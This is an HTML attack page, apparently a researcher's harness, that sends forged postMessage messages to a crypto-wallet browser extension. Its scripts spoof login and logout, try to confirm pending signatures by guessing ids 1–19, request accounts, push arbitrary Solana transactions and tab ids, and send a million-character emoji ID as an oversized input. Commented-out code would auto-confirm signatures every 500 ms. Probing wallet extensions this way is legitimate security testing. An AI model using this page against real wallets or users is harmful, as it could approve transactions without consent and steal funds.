<!DOCTYPE html>
<html>
    <head>
        <title>
            🛝
        </title>
        <style>
            body {
                padding: 0;
                margin: 0;
                background-color: black;
            }

            #header {
                width:100%;
                background-color: #353555;
                color:#EeB540;
            }

            .btn2 {
                background: #803030!important;
            }
            
            .btn {
                    
                display: inline-block;
                    outline: 0;
                    cursor: pointer;
                    text-align: center;
                    border: 0;
                    padding: 7px 16px;
                    min-height: 36px;
                    min-width: 36px;
                    color: #ffffff;
                    background: #008060;
                    border-radius: 4px;
                    font-weight: 500;
                    font-size: 14px;
                    box-shadow: rgba(0, 0, 0, 0.05) 0px 1px 0px 0px, rgba(0, 0, 0, 0.2) 0px -1px 0px 0px inset;
                    :hover {
                        background: #006e52;
                    }
                
            }
            
            #main {
                width: 85%;
                margin: 0 auto 0 auto;
                background-color: antiquewhite;
            }

            .subtitle {
                color: #FeA570;
                background:black;
                text-shadow: 2px 1px #1f0e0f;
            }

            .subFun {
                padding: 4px 0;
            }
        </style>
    </head>
    <body>
        <div id="header">
            <marquee>hack</marquee>
        </div>
        <script>
          
            
            const get_sol_message_w_tabId_2 = () => {
                let message = get_sol_message_2();
                let solTabId = document.getElementById('solTabId').value;
                if ( solTabId != "") {
                    message["tabId"] = solTabId;
                }

                return message;
            }


            const get_sol_message_2 = () => {
                let message = { type: 'sol:send' }
                let payload = {}
                
                let params = {}
                let solSerializedTx = document.getElementById('solSerializedTx').value;
                if ( solSerializedTx != "") {
                    params["serializedTx"] = solSerializedTx;
                    payload["params"] = params;
                }


                let solPendingId = document.getElementById('solPendingId').value;
                if (solPendingId != "") {
                    payload["pendingId"] = solPendingId;
                }


                let payloadMethod = document.getElementById('solPayloadMethod').value;
                if (payloadMethod != "") {
                    payload["method"] = payloadMethod;
                }


                let solId;
                if (document.getElementById("cowsIdCheckbox").checked) {
                    solId = '\uD83D\uDC04'.repeat(1000000);
                } else {
                    solId = document.getElementById('solId').value;
                    if (solId != "") {
                        payload["id"] = solId;
                    }
                }


                message["payload"] = payload;
                return message;
            }

            const solSend_2 = () => {
                message = get_sol_message_2();
                console.log("[*] SENDING message: ");
                console.log(message);
                window.postMessage(message, window.location.origin);
            }

            const solSendWTabId_2 = () => {
                message = get_sol_message_w_tabId_2();
                console.log("[*] SENDING message: ");
                console.log(message);
                window.postMessage(message, window.location.origin);
            }
            


///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////


            const handleSignIn = () => {
                console.log('[***] LOGIN');
                window.postMessage({type: 'eth:send', payload: {"message":"login"}}, window.location.origin)
            }
            

            const handleSignOut = () => {
                console.log('[***] LOGOUT');
                window.postMessage({type: 'eth:send', payload: {"message":"logout"}}, window.location.origin)
            }
            
            
            const handleNotTrustedSignOut = () => {
                console.log('[***] NOT TRUSTED LOGOUT');
                var btn = document.getElementById("logoutButton");
                btn.click();
            }
            
            
            const handleConfirmSignature = (id) => {
                console.log('[***] CONFIRM SIGNATURE');
                window.postMessage({type: 'eth:send', payload: {"message":"confirm_signature", "pendingId": id.toString()}}, window.location.origin)
            }
            
            const handleMultipleConfirmSignatures = () => { 
                for (let i = 1; i < 20; i++) {
                    handleConfirmSignature(i);
                }
            }
            
            const handleEth_requestAccounts = () => {
                console.log('[***] ETH_REQUESTACCOUNTS');
                window.postMessage({type: 'eth:send', payload: {"id":3, jsonrpc:"2.0", "method":"eth_requestAccounts", "params":[]}}, window.location.origin)
            }


        </script>
        <div id="main">
            <h1>🛝 update 9 </h1>

            <form>
            <h2 class="subtitle">v2</h2>

            <div class="subFun" style="background-color:rgba(120, 0, 240, 0.5);">
                <input class="btn2 btn" type="button" onclick="solSendWTabId_2()" value="solSendWTabId_2" />
                <input type="text" id="solTabId" placeholder="message.tabId" />
                <hr />

                <div class="subFun" style="background-color:rgba(120, 240, 0, 0.5);">
                    <input class="btn2 btn" type="button" onclick="solSend_2()" value="solSend_2" />
                    <input type="text" id="solPayloadMethod" placeholder="payload.method" />
                    <input type="text" id="solId" placeholder="params.id" />
                    <input type="text" id="solPendingId" placeholder="params.pendingId" />
                    Cow ID: <input type="checkbox" id="cowsIdCheckbox" />
                    <input type="text" id="solSerializedTx" placeholder="payload.params.serializedTx" />
                    <hr />
                </div>
            </div>
            </form>


            <!--           ###                -->
            <!--           ###                -->
            <!--           ###                -->
            

            <form>
                <h2 class="subtitle">v1</h2>

                <input class="btn" type="button" onclick="handleSignIn()" value="LOGIN" />
                <hr />

                <input id="logoutButton" class="btn" type="button" onclick="handleSignOut()" value="LOGOUT" />
                <hr />

                <input class="btn" type="button" onclick="handleNotTrustedSignOut()" value="NOT TRUSTED LOGOUT" />
                <hr />

                <input class="btn" type="button" onclick="handleConfirmSignature(9)" value="CONFIRM SIGNATURE" />
                <hr />

                <input class="btn" type="button" onclick="handleEth_requestAccounts()" value="ETH_REQUESTACCOUNTS" />
                <hr />

            </form>
            <script>
                //setInterval(handleMultipleConfirmSignatures, 500);
                //setTimeout(handleSignOut,3000);
            </script>
            <!--<h3>Confirming signatures every 500 ms</h3>-->
        </div>
    </body>
</html>